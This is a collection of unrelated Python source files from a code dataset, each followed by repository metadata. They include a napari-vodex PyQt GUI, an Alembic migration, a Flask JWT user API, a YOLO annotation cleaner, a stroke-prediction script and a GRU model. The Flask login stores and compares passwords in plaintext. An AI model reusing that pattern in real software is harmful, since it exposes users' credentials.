or off.')\n\n if ok:\n # check that all the names are unique\n if label_name in self.label_names:\n self.launch_popup(\"The label names must be unique!\")\n label_name = None\n # check that it is not empty\n if not label_name:\n label_name = None\n else:\n label_name = None\n\n # add to the list of labels\n if label_name is not None:\n self.label_names.append(label_name)\n\n return label_name\n\n def add_row(self, label_name=None, description=\"\"):\n \"\"\"\n Adds the label name to the table.\n If the label_name is not provided, triggers the pop-up to ask for the label name.\n \"\"\"\n\n if label_name is not None:\n self.label_names.append(label_name)\n else:\n label_name = self.get_label_name()\n\n if label_name is not None:\n # add to the table\n n_rows = self.label_table.rowCount()\n self.label_table.insertRow(n_rows)\n self.label_table.setRowHeight(n_rows, self.ROW_HEIGHT)\n\n self.label_table.setItem(n_rows, 0, QTableWidgetItem(label_name))\n self.label_table.setItem(n_rows, 1, QTableWidgetItem(description))\n\n def delete_row(self, in_use: bool):\n \"\"\"\n in_use: indicates if the label is in use. If in use, it will not be deleted.\n \"\"\"\n if not in_use:\n selected_row = self.label_table.currentRow()\n name = self.label_table.item(selected_row, 0).text()\n self.label_names.remove(name)\n self.label_table.removeRow(selected_row)\n\n def get_selected_name(self):\n \"\"\"\n Returns the label name on the selected row.\n \"\"\"\n selected_row = self.label_table.currentRow()\n name = self.label_table.item(selected_row, 0).text()\n return name\n\n def get_names(self):\n \"\"\"\n Returns all the names in the table.\n \"\"\"\n n_rows = self.label_table.rowCount()\n state_names = []\n for row in range(n_rows):\n name = self.label_table.item(row, 0).text()\n state_names.append(name)\n return state_names\n\n def get_descriptions(self):\n \"\"\"\n Returns all the descriptions in the table.\n \"\"\"\n n_rows = self.label_table.rowCount()\n state_info = {}\n for row in range(n_rows):\n name = self.label_table.item(row, 0).text()\n state_info[name] = self.label_table.item(row, 1).text()\n return state_info\n\n def freeze(self):\n self.label_table.setEnabled(False)\n self.add_label.setEnabled(False)\n self.delete_selected.setEnabled(False)\n self.edit_labels.show()\n self.save_labels.hide()\n\n def unfreeze(self):\n self.label_table.setEnabled(True)\n self.add_label.setEnabled(True)\n self.delete_selected.setEnabled(True)\n self.edit_labels.hide()\n self.save_labels.show()\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_() # this will show our messagebox\n\n\nclass TimingTab(QWidget):\n \"\"\"\n Contains the information about the timing of the conditions.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n # Create a top-level layout\n main_lo = QVBoxLayout()\n self.setLayout(main_lo)\n\n # Create and connect the combo box to switch between annotation type pages\n self.annotation_type = QComboBox()\n self.annotation_type.addItems([\"Cycle\", \"Timeline\"])\n main_lo.addWidget(self.annotation_type)\n\n table_lo = QHBoxLayout()\n # Label adder\n self.add_button = QPushButton(\"Add condition\")\n self.del_button = QPushButton(\"Delete condition\")\n self.ROW_HEIGHT = 30\n self.add_button.setFixedHeight(self.ROW_HEIGHT)\n\n input_lo = QVBoxLayout()\n input_lo.addWidget(self.add_button)\n input_lo.addWidget(self.del_button)\n input_lo.addStretch(42)\n table_lo.addLayout(input_lo)\n\n # Table\n self.table = QTableWidget()\n self.set_up_table()\n table_lo.addWidget(self.table)\n main_lo.addLayout(table_lo)\n\n self.msg = InputError()\n\n def set_up_table(self):\n self.table.setColumnCount(2)\n self.table.setColumnWidth(0, 150)\n self.table.setHorizontalHeaderLabels([\"Label name\", \"Duration (in frames!)\"])\n self.table.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.table.setSelectionMode(QAbstractItemView.SingleSelection)\n h_header = self.table.horizontalHeader()\n h_header.setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n\n def add_row(self, labels: List[str], label_name: str = None, duration: int = None):\n \"\"\"\n Adds a row to the table and sets the widgets in the cells.\n\n Args:\n labels: available label names to add to the combo box.\n label_name: the name of the label to set for the row\n duration: the duration to set for the row\n Learning Resources:\n Instead of setting widgets for each cell,\n a better way would be to use a delegate https://forum.qt.io/topic/88486/dropdown-in-qtablewdget\n \"\"\"\n # create the elements to insert\n label_choice = QComboBox()\n label_duration = QSpinBox()\n label_duration.setRange(1, 1000000000)\n label_choice.addItems(labels)\n label_duration.setMinimum(1)\n\n n_rows = self.table.rowCount()\n self.table.insertRow(n_rows)\n self.table.setRowHeight(n_rows, self.ROW_HEIGHT)\n\n self.table.setCellWidget(n_rows, 0, label_choice)\n self.table.setCellWidget(n_rows, 1, label_duration)\n\n # set the values if provided\n if label_name is not None:\n label_choice.setCurrentText(label_name)\n if duration is not None:\n label_duration.setValue(duration)\n\n def delete_row(self):\n selected_row = self.table.currentRow()\n self.table.removeRow(selected_row)\n\n def update_choices(self, labels):\n \"\"\"\n Updates the labels on all the combo boxes.\n Assumes that all the chosen labels are present in the new labels.\n \"\"\"\n n_rows = self.table.rowCount()\n for row in range(n_rows):\n chosen_label = self.table.cellWidget(row, 0).currentText()\n assert chosen_label in labels, f\"A label {chosen_label} is chosen, \" \\\n f\"but it is missing from the labels: {labels}\"\n self.table.cellWidget(row, 0).clear()\n self.table.cellWidget(row, 0).addItems(labels)\n self.table.cellWidget(row, 0).setCurrentText(chosen_label)\n\n def check_in_use(self, label_name: str) -> bool:\n \"\"\"\n Checks if a given label name has been chosen.\n \"\"\"\n chosen_names = self.get_names_sequence()\n in_use = label_name in chosen_names\n if in_use:\n self.launch_popup(f\"Label {label_name} is in use!\")\n return in_use\n\n def get_names_sequence(self) -> List[str]:\n n_rows = self.table.rowCount()\n label_name_order = [self.table.cellWidget(row, 0).currentText() for row in range(n_rows)]\n return label_name_order\n\n def get_duration_sequence(self):\n n_rows = self.table.rowCount()\n duration = [self.table.cellWidget(row, 1).value() for row in range(n_rows)]\n return duration\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n\nclass AnnotationPage(QWidget):\n\n def __init__(self):\n super().__init__()\n\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n # create labels Tab\n self.labels = LabelsTab()\n self.timing = TimingTab()\n self.splitter = QSplitter(Qt.Vertical)\n self.splitter.addWidget(self.labels)\n self.splitter.addWidget(self.timing)\n self.main_layout.addWidget(self.splitter)\n\n self.add_pb = QPushButton(\"Add annotation to the experiment\")\n self.edit_pb = QPushButton(\"Edit annotation\")\n self.delete_pb = QPushButton(\"Delete annotation\")\n self.main_layout.addWidget(self.add_pb)\n buttons_lo = QHBoxLayout()\n buttons_lo.addWidget(self.edit_pb)\n buttons_lo.addWidget(self.delete_pb)\n self.main_layout.addLayout(buttons_lo)\n self.edit_pb.hide()\n self.delete_pb.hide()\n\n def freeze(self):\n self.add_pb.hide()\n self.edit_pb.show()\n self.delete_pb.show()\n\n self.labels.setEnabled(False)\n self.timing.setEnabled(False)\n\n def unfreeze(self):\n self.add_pb.show()\n self.edit_pb.hide()\n self.delete_pb.hide()\n\n self.labels.setEnabled(True)\n self.timing.setEnabled(True)\n\n\nclass AnnotationTab(QWidget):\n\n def __init__(self):\n super().__init__()\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n self.annotations = {}\n self.add_annotation_pb = QPushButton(\"Add annotation\")\n self.main_layout.addWidget(self.add_annotation_pb)\n\n self.pageCombo = None\n self.stackedLayout = None\n\n self.msg = InputError()\n\n def switchPage(self):\n \"\"\"\n What to do when the annotation is changed.\n Change the stackedLayout based on the pageCombo currentIndex.\n \"\"\"\n self.stackedLayout.setCurrentIndex(self.pageCombo.currentIndex())\n\n def initialize_annotation_list(self):\n switch_lo = QHBoxLayout()\n switch_lo.addWidget(QLabel(\"Available annotations:\"))\n\n # Create and connect the combo box to switch between annotation type pages\n self.pageCombo = QComboBox()\n switch_lo.addWidget(self.pageCombo)\n\n # Create the stacked layout\n self.stackedLayout = QStackedLayout()\n\n # Add the combo box and the stacked layout to the top-level layout\n self.main_layout.addLayout(switch_lo)\n self.main_layout.addLayout(self.stackedLayout)\n\n def create_ap(self, annotation_name):\n \"\"\"\n Creates an Annotation page and adds it to the Annotation tab\n \"\"\"\n # add information about the annotations\n annotation = AnnotationPage()\n self.annotations[annotation_name] = annotation\n self.pageCombo.addItem(annotation_name)\n self.stackedLayout.addWidget(annotation)\n\n # set the added item active\n self.pageCombo.setCurrentText(annotation_name)\n self.switchPage()\n\n def get_annotation_name(self):\n annotation_name, ok = QInputDialog.getText(self, 'Enter annotation name',\n 'Try to choose meaningful names, '\n 'for example:\\n\"Light\" to describe '\n 'whether the light was on or off;\\n'\n '\"Drug\" to set the time when you '\n 'added the drug;')\n if ok:\n # check that all the names are unique\n if annotation_name in self.annotations.keys():\n self.launch_popup(\"The annotation names must be unique!\")\n annotation_name = None\n # check that the name is not empty\n if not annotation_name:\n self.launch_popup(\"The annotation name can not be empty!\")\n annotation_name = None\n else:\n annotation_name = None\n return annotation_name\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n\nclass AnnotationCheckboxes(QWidget):\n def __init__(self, annotation_name: str, label_names: List[str]):\n super().__init__()\n self.layout = QVBoxLayout()\n self.setLayout(self.layout)\n\n self.group = annotation_name\n self.group_label = QLabel(annotation_name)\n self.layout.addWidget(self.group_label)\n\n self.checkboxes = {}\n self.update_labels(label_names)\n\n def remove_unused(self, label_names: List[str]):\n for name in self.checkboxes.keys():\n if name not in label_names:\n child = self.layout.takeAt(self.checkboxes[name])\n self.checkboxes.pop(name)\n if child.widget():\n child.widget().deleteLater()\n\n def add_new(self, label_names: List[str]):\n for name in label_names:\n if name not in self.checkboxes.keys():\n i_name = self.layout.count()\n self.checkboxes[name] = i_name\n self.layout.insertWidget(i_name, LabelCheckBox(self.group, name))\n\n def update_labels(self, label_names: List[str]):\n self.remove_unused(label_names)\n self.add_new(label_names)\n\n def get_checked_conditions(self):\n conditions = []\n for i_checkbox in self.checkboxes.values():\n checkbox = self.layout.itemAt(i_checkbox).widget()\n if checkbox.isChecked():\n conditions.append(checkbox.get_label_info())\n return conditions\n\n\nclass DataReaderWriterTab(QWidget):\n \"\"\"\n Loads and saves volumes.\n \"\"\"\n\n def __init__(self, napari_viewer):\n super().__init__()\n\n self.labels = {}\n self._napari = napari_viewer\n\n self.ROW_HEIGHT = 30\n # Create a top-level layout\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n # 1. Individual volumes\n section1_title = QLabel(\"[LOAD OPTION 1] Load based on volumes/slices IDs\")\n self.main_layout.addWidget(QLabel(\"____________________________________________________\"))\n self.main_layout.addWidget(section1_title)\n\n self.v_info_pb = QPushButton(\"\")\n self.v_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.v_info_pb.clicked.connect(self.how_to_volumes)\n v_label = QLabel(\"Volumes: \")\n self.volumes = QLineEdit()\n # Regex explanation :\n # this allows integers separated by , and slices : .\n # For example: 12, 34, 4:56 , 72 : 34 is a valid input\n # (although slice 72:34 is invalid, it will be filtered out later)\n # but this: 4, 5, 6:7 : 8 is invalid because of two consecutive \":\"\n reg_ex = QRegExp(r\"^ *(\\d{1,}|\\d{1,} *: *\\d{1,})( *|, *\\d{1,}|, *\\d{1,} *: *\\d{1,}| *)*$\")\n input_validator = QRegExpValidator(reg_ex, self.volumes)\n self.volumes.setValidator(input_validator)\n\n # slice input\n # TODO: add check if the slices are valid for the current dataset (use Signals?) (low priority)\n self.s_info_pb = QPushButton(\"\")\n self.s_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.s_info_pb.clicked.connect(self.how_to_slices)\n s_label = QLabel(\"Slices: \")\n self.slices = QLineEdit()\n self.slices.setValidator(input_validator)\n\n volume_lo = QHBoxLayout()\n volume_lo.addWidget(v_label)\n volume_lo.addWidget(self.volumes)\n volume_lo.addWidget(self.v_info_pb)\n slice_lo = QHBoxLayout()\n slice_lo.addWidget(s_label)\n slice_lo.addWidget(self.slices)\n slice_lo.addWidget(self.s_info_pb)\n volume_slice_lo = QVBoxLayout()\n volume_slice_lo.addLayout(volume_lo)\n volume_slice_lo.addLayout(slice_lo)\n\n # 2 checkboxes whether to consider the head and the tail of the dataset\n self.head_cb = QCheckBox(\"Head\")\n self.tail_cb = QCheckBox(\"Tail\")\n head_tail_lo = QVBoxLayout()\n head_tail_lo.addWidget(self.head_cb)\n head_tail_lo.addWidget(self.tail_cb)\n\n volume_slice_checkbox_lo = QHBoxLayout()\n volume_slice_checkbox_lo.addLayout(volume_slice_lo)\n volume_slice_checkbox_lo.addLayout(head_tail_lo)\n\n self.main_layout.addLayout(volume_slice_checkbox_lo)\n self.load_volumes_pb = QPushButton(\"Load\")\n self.main_layout.addWidget(self.load_volumes_pb)\n self.main_layout.addWidget(horizontal_line())\n\n # 2. Annotation list\n self.main_layout.addWidget(QLabel(\"____________________________________________________\"))\n section2_title = QLabel(\"[LOAD OPTION 2] Load based on experimental conditions\")\n self.a_info_pb = QPushButton(\"\")\n self.a_info_pb.setIcon(self.style().standardIcon(getattr(QStyle, \"SP_MessageBoxInformation\")))\n self.a_info_pb.clicked.connect(self.how_to_annotations)\n intro_lo = QHBoxLayout()\n intro_lo.addWidget(section2_title)\n intro_lo.addWidget(self.a_info_pb)\n self.main_layout.addLayout(intro_lo)\n\n self.annotations = {}\n\n self.checkbox_lo = QHBoxLayout()\n self.checkboxes = []\n self.info_text = QLabel(\"Add time annotation to the experiment\\nto see the options.\")\n self.checkbox_lo.addWidget(self.info_text)\n\n self.main_layout.addLayout(self.checkbox_lo)\n\n buttons_lo = QVBoxLayout()\n logic_label = QLabel(\"Use logic: \")\n self.logic_box = QComboBox()\n self.logic_box.addItems([\"or\", \"and\"])\n self.find_volumes = QPushButton(\"Find volumes\")\n self.volumes_label = QLabel(\"Volumes that satisfy the conditions:\")\n self.volumes_info = QTextBrowser()\n self.load_conditions_pb = QPushButton(\"Load\")\n\n buttons_lo.addWidget(logic_label)\n buttons_lo.addWidget(self.logic_box)\n buttons_lo.addWidget(self.find_volumes)\n buttons_lo.addWidget(self.volumes_label)\n buttons_lo.addWidget(self.volumes_info)\n buttons_lo.addWidget(self.load_conditions_pb)\n\n self.main_layout.addLayout(buttons_lo)\n self.main_layout.addWidget(horizontal_line())\n\n # self.main_layout.addStretch(42)\n self.msg = InputError(\"Info\")\n\n def launch_popup(self, text):\n self.msg.setText(text)\n x = self.msg.exec_()\n\n def update_labels(self, labels: dict):\n self.info_text.hide()\n # remove unused\n # use use list to force a copy of the keys to be made\n for annotation_name in list(self.annotations):\n if annotation_name not in labels:\n widget = self.annotations.pop(annotation_name)\n widget.setParent(None)\n widget.deleteLater()\n\n # add new\n for annotation_name, label_names in labels.items():\n if annotation_name not in self.annotations:\n self.annotations[annotation_name] = AnnotationCheckboxes(annotation_name, label_names)\n self.checkbox_lo.addWidget(self.annotations[annotation_name])\n else:\n self.annotations[annotation_name].update_labels(label_names)\n\n def how_to_volumes(self):\n text = \"Enter the indices for the volumes you would like to load. \" \\\n \"Valid inputs include individual indices, comma-separated lists, or ranges using a colon. \" \\\n \"Spaces are ignored. The volumes are loaded in ascending order. For example:\\n\" \\\n \"• Individual indices: 0, 4, 6\\n\" \\\n \"• Ranges: 9:12 (note that volume 12 will be loaded)\\n\" \\\n \"• Combined inputs: 2, 4, 6, 9:12, 19 (loads volumes 2, 4, 6, 9, 10, 11, 12, and 19)\\n\" \\\n \"Use the examples shown to specify the desired volumes to load.\\n\\n\" \\\n \"If slices to load are specified, you can leave the volumes empty. \" \\\n \"Then the specified slices will be loaded for all volumes.\\n\\n\" \\\n \"If the dataset has unfilled volumes at the beginning or end of the recording, \" \\\n \"you can include/exclude them by checking the Head and Tail checkboxes. \" \\\n \"This might be important if you are trying to load a set of slices that \" \\\n \"are not present in the Head or Tail of the dataset.\"\n\n self.launch_popup(text=text)\n\n def how_to_slices(self):\n text = \"Enter the indices for the slices you would like to load. \" \\\n \"Valid inputs include individual slices, \" \\\n \"comma-separated, or ranges using a colon. Spaces are ignored. \" \\\n \"ORDER IS IGNORED ( loaded in ascending order! ) \" \\\n \"For example:\\n\" \\\n \"• Individual slices: 0, 2, 5\\n\" \\\n \"• Ranges: 0:5 (note that volume 5 WILL BE LOADED)\\n\" \\\n \"• Combined inputs: 0, 2, 5:7, 9 (loads slices 0, 2, 5, 6, 7, 9)\\n\" \\\n \"Use the format shown in the examples to specify the desired slices to load.\\n\\n\" \\\n \"If slices to volumes are specified, you can leave the slices empty. \" \\\n \"Then all the slices will be loaded for the specified volumes.\\n\\n\" \\\n \"If the dataset has unfilled volumes at the beginning or end of the recording, \" \\\n \"you can include/exclude them by checking the Head and Tail checkboxes.\" \\\n \"This might be important if you are trying to load a set of slices that \" \\\n \"are not present in the Head or Tail of the dataset.\"\n\n self.launch_popup(text=text)\n\n def how_to_annotations(self):\n text = \"If you have added time annotations to the experiment, you will see the annotation's names and labels. \" \\\n \"Check the checkboxes by the labels for which you want to get the volumes, \" \\\n \"and choose how to combine them with a logical OR or a logical AND. \" \\\n \"Then, click the 'Find volumes' button to get a list of volume IDs that \" \\\n \"correspond to the chosen conditions or 'Load' to load all such volumes into napari.\\n\\n\" \\\n \"When you are choosing 'OR', all the conditions you picked will be combined with a logical OR.\" \\\n \" This means that vodex will pick volumes with slices that correspond \" \\\n \"to at least one of the conditions \" \\\n \"that you picked. It does not mean that the whole volume corresponds to one of the conditions. \" \\\n \"Half of the slices in the volume can correspond to one condition and the other half to another.\\n\\n\" \\\n \"When you are choosing 'AND', vodex will pick volumes with slices that correspond to all the \" \\\n \"conditions that you picked at the same time. If at least one slice in a volume does not correspond\" \\\n \" to all the conditions, such volume will not be picked.\"\n\n self.launch_popup(text=text)\n\n def get_volumes(self):\n \"\"\"\n Gets volumes from text.\n \"\"\"\n requested_volumes = self.volumes.text()\n volumes = []\n if requested_volumes:\n for vol in requested_volumes.split(\",\"):\n if \":\" in vol:\n start, end = vol.split(\":\")\n assert start < end, f\"The slice start {start} must be smaller than the end {end}\"\n volumes.extend(range(int(start.strip()), (int(end.strip()) + 1)))\n else:\n volumes.append(int(vol.strip()))\n # TODO: check for repeats ?\n return volumes, requested_volumes\n\n def get_slices(self):\n \"\"\"\n Gets slices from text.\n \"\"\"\n requested_slices = self.slices.text()\n slices = []\n if requested_slices:\n for sl in requested_slices.split(\",\"):\n if \":\" in sl:\n start, end = sl.split(\":\")\n assert start < end, f\"The slice start {start} must be smaller than the end {end}\"\n slices.extend(range(int(start.strip()), (int(end.strip()) + 1)))\n else:\n slices.append(int(sl.strip()))\n return slices, requested_slices\n\n\nclass VodexView(QWidget):\n \"\"\"\n Does everything about the GUI View.\n \"\"\"\n\n def __init__(self, viewer):\n super().__init__()\n\n self.nt = NewExperimentTab()\n self.lt = LoadExperimentTab()\n\n self.vt = VolumeTab()\n self.st = SaveTab()\n self.it = InitialiseTab()\n self.at = AnnotationTab()\n self.dt = DataReaderWriterTab(viewer)\n self.napari = viewer\n\n self.main_layout = QVBoxLayout()\n self.setLayout(self.main_layout)\n\n self.nt_pb = QPushButton(\"Create New Experiment\")\n self.lt_pb = QPushButton(\"Load Saved Experiment\")\n self.main_layout.addWidget(self.lt_pb)\n self.main_layout.addWidget(self.nt_pb)\n\n def initialize_new_experiment(self):\n self.nt_pb.hide()\n self.lt_pb.hide()\n\n tabs = QTabWidget()\n # 1. New Experiment Tab\n # More on QSplitter:\n # https://www.tutorialspoint.com/pyqt/pyqt_qsplitter_widget.htm\n splitter_1 = QSplitter(Qt.Vertical)\n splitter_1.addWidget(self.nt)\n splitter_1.addWidget(self.vt)\n splitter_1.addWidget(self.it)\n tabs.addTab(splitter_1, \"Image Data\")\n # self.it.hide()\n\n # 2. Time Annotation Tab\n tabs.addTab(self.at, \"Time Annotation\")\n\n # 3. Load/Save Tab\n splitter_3 = QSplitter(Qt.Vertical)\n splitter_3.addWidget(self.dt)\n splitter_3.addWidget(self.st)\n tabs.addTab(splitter_3, \"Load/Save Data\")\n\n self.main_layout.addWidget(tabs, alignment=Qt.AlignTop)\n\n # disable until called for the first time\n self.nt.list_widget.setEnabled(False)\n self.vt.setEnabled(False)\n self.st.setEnabled(False)\n\n def initialize_load_experiment(self):\n self.nt_pb.hide()\n self.lt_pb.hide()\n\n tabs = QTabWidget()\n\n # 2. Load Experiment Tab\n tabs.addTab(self.lt, \"Image Data\")\n\n # 2. Time Annotation Tab\n tabs.addTab(self.at, \"Time Annotation\")\n\n # 3. Load/Save Tab\n splitter_3 = QSplitter(Qt.Vertical)\n splitter_3.addWidget(self.dt)\n splitter_3.addWidget(self.st)\n tabs.addTab(splitter_3, \"Load/Save Data\")\n\n self.main_layout.addWidget(tabs)\n","repo_name":"LemonJust/napari-vodex","sub_path":"src/napari_vodex/_view.py","file_name":"_view.py","file_ext":"py","file_size_in_byte":42391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10937406779","text":"\"\"\"users table\nRevision ID: 4b83761bf52a\nRevises: 0d3bdf63aacc\nCreate Date: 2029-12-29 17:17:20.500426\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4b83761bf52a'\ndown_revision = '0d3bdf63aacc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('city', sa.String(length=64), nullable=True))\n op.add_column('user', sa.Column('description', sa.String(length=256), nullable=True))\n op.add_column('user', sa.Column('phone', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'phone')\n op.drop_column('user', 'description')\n op.drop_column('user', 'city')\n # ### end Alembic commands ###","repo_name":"stsl256/LMS_for_tinkoff","sub_path":"Lms/migrations/versions/4b83761bf52a_users_table.py","file_name":"4b83761bf52a_users_table.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34140946076","text":"from flask_restful import Resource, reqparse\nfrom models.user import UserModel\nfrom flask_jwt_extended import create_access_token, jwt_required, get_jwt\nfrom blocklist import BLOCKLIST\n\n\narguments = reqparse.RequestParser()\narguments.add_argument('login', type=str, required=True, help=\"This field cannot be empty.\")\narguments.add_argument('senha', type=str, required=True, help=\"This field cannot be empty.\")\n\n\nclass Users(Resource):\n def get(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n return user.json(), 200\n return {'message': 'User ID not found'}, 400\n \n\n @jwt_required()\n def delete(self, user_id):\n user = UserModel.find_user(user_id)\n if user:\n try:\n user.delete_user()\n except:\n return {'message': 'An internal error ocurred trying to save user.'}, 500\n return {'message': 'User deleted.'}\n return {'message': 'User ID not found.'}, 400\n\n\nclass UsersRegister(Resource):\n def post(self):\n data = arguments.parse_args()\n\n if UserModel.find_by_login(data['login']):\n return {'message': 'This login already exists.'}, 401\n \n user = UserModel(**data)\n user.save_user()\n return {'message': 'User created successfully.', 'data': user.json()}, 200\n\n\nclass UserLogin(Resource):\n @classmethod\n def post(cls):\n data = arguments.parse_args()\n\n user = UserModel.find_by_login(data['login'])\n if user and user.senha == data['senha']:\n token = create_access_token(identity=user.user_id)\n return {'access_token': token}, 200\n return {'message':'The login or password is not correct.'}, 401\n\n\nclass UserLogout(Resource):\n @jwt_required()\n def post(self):\n jwt_id = get_jwt()['jti']\n BLOCKLIST.add(jwt_id)\n return {'message': 'Logged out successfully'}, 200","repo_name":"ricardo-dantas97/api-course-python-flask","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16879861569","text":"import sys\nimport q1 as v\n\nfile=open(sys.argv[1],'r')\n\nm=[]\n\nfor line in file:\n\tm += list(map(int,line.rstrip().split()))\n\n\n\n\np=v.q1(m)\n\nprint(p)\n","repo_name":"sankethosalli/CS213","sub_path":"iitdh/pp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23877893921","text":"import glob\nimport os\n\nos.chdir('/home/abhisek/Desktop/YoloImages/Yolo-Annotation-Tool-New-/Labels/extra_class_frames')\n\nannts = []\ncnt = 0\n\nfor file in glob.glob('*.txt'):\n with open(file, 'r') as f:\n annts = f.read()\n f.close()\n if len(annts) == 0:\n os.remove(file)\n else:\n annt = annts.split()\n\n lines = ''\n # for i,val in enumerate(annt):\n # if i%5 == 4 and val == '0':\n # annt[i] = '81'\n\n for i,val in enumerate(annt):\n\n if i % 5 == 4 and len(val) <= 2:\n lines += (val + '\\n')\n elif len(val) <= 4:\n lines += (val + ',')\n\n if len(lines) > 0:\n with open(file, 'w') as f:\n f.write(lines)\n f.close()\n else:\n os.remove(file)","repo_name":"ad4529/Printer_Detection","sub_path":"Preprocessing Annotations/parse_annts_from_tool.py","file_name":"parse_annts_from_tool.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33850888692","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('healthcare-dataset-stroke-data.csv')\ndf.head(3)\ndf.describe()\ndf.isnull().sum()\nplt.figure(figsize=(10,8))\nsns.heatmap(df.corr(),annot=True)\nplt.show()\n\ndf=df.dropna().reset_index(drop=True)\ndf.isnull().sum()\ndf=df.drop(columns=['id'])\nplt.figure(figsize=(12,8))\ndf.boxplot()\nplt.show()\n\nfor i in df.select_dtypes(include=np.number).columns:\n sns.boxplot(df[i])\n plt.show()\ndf['hypertension'] = df['hypertension'].astype(object)\ndf['heart_disease'] = df['heart_disease'].astype(object)\ndf['stroke'] = df['stroke'].astype(object)\ndf_int=df.select_dtypes(include=np.number)\ndf_cat=df.select_dtypes(exclude=np.number)\ndf_int.head()\ndf_cat.head()\nfor i in df_cat:\n sns.countplot(df[i])\n plt.show()\n\npd.crosstab(df['ever_married'],df['stroke']).plot(kind='bar',stacked=True)\nplt.show()\npd.crosstab(df['work_type'],df['stroke']).plot(kind='bar',stacked=True)\nplt.show()\nplt.figure(figsize=(12,8))\nsns.kdeplot(df[df['stroke']==0]['age'],shade=True,label='no_stroke')\nsns.kdeplot(df[df['stroke']==1]['age'],shade=True,label='stroke')\nplt.xlabel('Age')\nplt.title('Stroke Density vs Age')\n\nplt.legend()\nplt.show()\nplt.figure(figsize=(12,8))\nsns.kdeplot(df[df['stroke']==0]['bmi'],shade=True,label='no_stroke')\nsns.kdeplot(df[df['stroke']==1]['bmi'],shade=True,label='stroke')\nplt.legend()\nplt.title('Stroke Density vs BMI ')\nplt.show()\n\n#trích xuất đặc trưng\nX=pd.get_dummies(df,columns=df_cat.columns,drop_first=True).iloc[:,:-2]\ny=pd.to_numeric(df['stroke'])\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test=train_test_split(X,y,stratify=y,random_state=8)\nfrom imblearn.over_sampling import SMOTE\nsmt = SMOTE(random_state=8)\nX_train_sm, y_train_sm = smt.fit_resample(X_train, y_train)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import classification_report\nknnsm=KNeighborsClassifier()\nknnsm.fit(X_train_sm,y_train_sm)\nprint('Train:',knnsm.score(X_train_sm,y_train_sm))\nprint('Test:',knnsm.score(X_test,y_test))\ny_pred_knnsm=knnsm.predict(X_test)\n\nprint(classification_report(y_test,y_pred_knnsm))","repo_name":"nguyentritrung19052000/Data_Visialization","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7808094917","text":"import sys\n\nimport os\nfrom PIL import Image\nprint('hello')\ninputPath=sys.argv[1]\nprint(inputPath)\noutputPath=sys.argv[2]\n\n\n\nif not os.path.exists(outputPath):\n os.mkdir(outputPath)\n# lopp the files in folder images\nfor file in os.listdir(inputPath):\n openfile = inputPath + file\n img=Image.open(openfile)\n outfile=outputPath+file+'png'\n img.save(outfile,'png')\n\n\n\n","repo_name":"dielianhua2020/firstTry","sub_path":"imgConverter.py","file_name":"imgConverter.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9490224438","text":"import io\n\nimport torch\nimport torch.nn as nn\nfrom nltk.tokenize import word_tokenize\nfrom torch.utils.data import Dataset\n\n\nclass GRUNet(nn.Module):\n def __init__(self, input_size, hidden_size, output_size, n_layers, drop_prob=0.2):\n super(GRUNet, self).__init__()\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n self.gru = nn.GRU(input_size, hidden_size, n_layers,\n batch_first=True, dropout=drop_prob, bidirectional=True)\n self.linear = nn.Linear(2*hidden_size, output_size)\n self.linear1 = nn.Linear(output_size, 1)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input):\n out, hidden = self.gru(input)\n linear_out = self.linear(out[:, -1, :])\n linear_out = self.relu(linear_out)\n linear_out = self.linear1(linear_out)\n res = self.sigmoid(linear_out) * 6\n return res, hidden\n\n def init_hidden(self, batch_size, device, num_directions=2):\n weight = next(self.parameters()).data\n hidden = weight.new(self.n_layers * num_directions, batch_size,\n self.hidden_size).zero_().to(device)\n return hidden\n\n\nclass EfcamdatDataset(Dataset):\n def __init__(self, data, emb):\n self.data = data\n self.emb = emb\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n text = self.data.iloc[idx]['sentences']\n words = 